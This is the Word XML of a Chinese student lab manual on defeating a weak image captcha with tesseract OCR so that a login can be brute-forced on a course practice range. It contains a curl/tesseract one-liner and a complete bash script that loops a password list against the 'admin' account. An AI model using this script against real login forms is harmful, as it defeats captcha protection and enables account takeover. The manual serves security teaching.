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E2A07" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a5"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="heading_0"/>
      <w:r>
        <w:t>子实验</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C </w:t>
      </w:r>
      <w:r>
        <w:t>验证码</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OCR </w:t>
      </w:r>
      <w:r>
        <w:t>绕过暴力破解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>学生操作手册（</w:t>
      </w:r>
      <w:r>
        <w:t>Kali 2026.2</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="002E484B" w14:paraId="6A8FB50B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct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41639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color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>说明：基础任务使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Kali Shell </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>脚本（必做）；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Burp </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>插件方案作为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>选做拓展任务</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>，学有余力的同学尝试。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2BFBD609" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="heading_1"/>
      <w:r>
        <w:t>实验简介</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="1CA1EC6C" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>本实验为业务逻辑漏洞实训，复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>验证</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>码图片</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>过于简单、可被机器自动识别</w:t>
      </w:r>
      <w:r>
        <w:t>的安全漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7B66FB" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>靶场特点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEAF4CF" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>后端验证码为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>一次性有效</w:t>
      </w:r>
      <w:r>
        <w:t>（提交一次即销毁），属于正常校验逻辑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFA18A1" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>但验证</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>码图片无</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>噪点、无干扰线、字体规整，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>机器可全自动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> OCR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>识别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CC322D" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>攻击流程：自动获取验证码</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:t>自动识别</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:t>自动提交密码</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:t>批量爆破账号密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECE14BA" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>与之前实验区别：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B4CB38" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>实验</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> B</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>验证码不销毁</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>一个验证码重复使用</w:t>
      </w:r>
      <w:r>
        <w:t>爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB3272E" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>实验</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C</w:t>
      </w:r>
      <w:r>
        <w:t>：验证码每次都换新，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>机器自动识别新验证</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>码</w:t>
      </w:r>
      <w:r>
        <w:t>实现</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>全自动爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09464844" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="heading_2"/>
      <w:r>
        <w:t>实验环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="6AFA1B3C" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>操作系统：</w:t>
      </w:r>
      <w:r>
        <w:t>Kali Linux 2026.2</w:t>
      </w:r>
      <w:r>
        <w:t>（必做脚本环境）；</w:t>
      </w:r>
      <w:r>
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:r>
        <w:t>（选做拓展）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E6079A" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>工具：</w:t>
      </w:r>
      <w:r>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:t>（网络请求）、</w:t>
      </w:r>
      <w:r>
        <w:t>tesseract</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OCR </w:t>
      </w:r>
      <w:r>
        <w:t>图像识别）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709EA089" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>靶场地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B327A71" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>登录接口：</w:t>
      </w:r>
      <w:r w:rsidRPr="009975F7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>https://logic-vuln-lab-310714-6-1384301028.sh.run.tcloudbase.com/</w:t>
      </w:r>
      <w:r>
        <w:t>captcha/login_ocr.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD58664" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>验证码接口：</w:t>
      </w:r>
      <w:r w:rsidRPr="009975F7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>https://logic-vuln-lab-310714-6-1384301028.sh.run.tcloudbase.com/</w:t>
      </w:r>
      <w:r>
        <w:t>captcha/captcha.php?mode=clean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B1B57A" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="heading_3"/>
      <w:r>
        <w:t>实验任务</w:t>
      </w:r>
      <w:bookmarkStart w:id="4" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="7520AAC1" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>✅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>必做任务</w:t>
      </w:r>
      <w:r>
        <w:t>：使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:t>编写</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Shell </w:t>
      </w:r>
      <w:r>
        <w:t>脚本，完成全自动验证码识别</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:t>密码爆破</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t>⭐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>选做拓展任务</w:t>
      </w:r>
      <w:r>
        <w:t>（能力较</w:t>
      </w:r>
      <w:r>
        <w:t>强同学）：使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite + captcha-killer </w:t>
      </w:r>
      <w:r>
        <w:t>插件完成同</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>样爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1015010F" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="heading_4"/>
      <w:r>
        <w:t>【必做】</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Kali Shell </w:t>
      </w:r>
      <w:r>
        <w:t>脚本操作步骤（零基础照做）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="08DF1807" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="heading_5"/>
      <w:r>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r>
        <w:t>：打开</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:t>终端</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="22F59C76" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>快捷键：</w:t>
      </w:r>
      <w:r>
        <w:t>Ctrl + Alt + T</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2019E0" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="heading_6"/>
      <w:r>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r>
        <w:t>：安装</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OCR </w:t>
      </w:r>
      <w:r>
        <w:t>识别工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="4FF0AA64" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>依次输入两条命令，回车执行：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57FEDAFE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900356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sudo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apt update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sudo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apt install tesseract-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-y</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13932AC0" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>安装完成，输入命令验证：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149334B6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7D532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>tesseract --version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23E9AB19" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>输出版本信息即为安装成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B405062" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="heading_7"/>
      <w:r>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:r>
        <w:t>：测试单次验证码识别（理解原理）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="433EC16D" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>输入下面命令，自动下载验证</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>码图片</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>并识别字符：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2F4A945A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B2372A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 xml:space="preserve">curl -s -c cookie.txt -b cookie.txt "https://logic-vuln-lab-310714-6-1384301028.sh.run.tcloudbase.com/captcha/captcha.php?mode=clean" -o cap.png &amp;&amp; tesseract cap.png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stdout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| tr -d '\n '</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7300ECFE" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>执行结果：</w:t>
      </w:r>
      <w:r>
        <w:t>终端直接输出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:t>位验证码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A2E77F" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>cookie.txt</w:t>
      </w:r>
      <w:r>
        <w:t>：保存网站会话，保证获取验证码和登录使用同一个会话</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E78C785" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>cap.png</w:t>
      </w:r>
      <w:r>
        <w:t>：下载到本地的验证码图片</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207B1BFD" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="heading_8"/>
      <w:r>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:r>
        <w:t>：编写全自动爆破脚本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="12DE208C" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>创建脚本文件：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2BD2E5DF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72A1E1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lastRenderedPageBreak/>
              <w:t>nano captcha_brute.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4ED8C38C" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>复制全部代码粘贴到终端：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7C506E2D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6E47B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>#!/bin/bash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# </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>全自动验证码</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>OCR+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>密码爆破脚本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>TARGET="https://logic-vuln-lab-310714-6-1384301028.sh.run.tcloudbase.com/captcha/login_ocr.php"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CAPTCHA_URL="https://logic-vuln-lab-310714-6-1384301028.sh.run.tcloudbase.com/captcha/captcha.php?mode=clean"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# </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>密码字典列表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password_list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=(admin 123456 123 456 789 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>test root)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# </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>循环爆破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for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pwd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in "${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password_list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[@]}"; do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# </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>获取新验证码并保存会话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curl -s -c cookie.txt -b cookie.txt ${CAPTCHA_URL} -o cap.png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# </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>识别验证码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CODE=$(tesseract cap.png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stdout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| tr -d '\n ')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# </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>输出当前尝试信息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echo "</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>尝试密码：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>$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pwd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 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>识别验证码：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>$CODE"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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>提交登录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RESULT=$(curl -s -X POST -c cookie.txt -b cookie.txt -d "username=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admin&amp;password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=${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pwd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}&amp;code=${CODE}" ${TARGET})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echo "</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>返回结果：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>$RESULT"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# </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>判断爆破成功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if [[ $RESULT == *"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>登录成功</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>"* ]];then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    echo -e "\n===== </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>爆破成功！正确密码：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>$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pwd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====="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    b</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>reak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fi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>done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# </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>清理临时文件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>rm -f cap.png cookie.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
